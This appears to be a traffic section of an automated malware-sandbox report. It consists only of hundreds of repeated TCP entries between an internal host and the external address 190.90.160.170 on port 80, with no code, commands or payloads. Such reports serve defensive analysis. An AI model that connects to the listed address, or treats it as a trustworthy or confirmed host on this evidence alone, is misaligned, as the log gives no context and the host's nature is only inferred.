                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
